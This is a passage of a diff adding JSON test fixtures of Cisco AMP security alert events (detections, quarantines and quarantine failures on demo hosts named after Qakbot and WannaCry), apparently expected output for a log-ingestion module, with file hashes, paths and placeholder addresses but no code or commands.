"2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "el2j9fcqj.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 70734, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": 
"W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "kepv86368.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 71990, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": 
[ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "uqlq0o884.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73246, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 74502, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 75695, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + 
"process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 77209, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": 
"7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 927000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 78808, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + 
}, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 79928, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 
3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 81129, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + 
"host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 82330, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "igvj$vN.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 83443, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + 
"@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "6951045.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 84690, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": 
"Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "dc41e47ebba549ec5e616ed9e88a0376", + "file.hash.sha1": "99fffe78e0cbd7b508eed13a8633903dd89ed5f1", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 85948, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "dc41e47ebba549ec5e616ed9e88a0376", + "99fffe78e0cbd7b508eed13a8633903dd89ed5f1" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 
2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 87312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88505, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 89691, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + 
"forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90884, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.error.description": "Delete pending", + 
"cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 92070, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 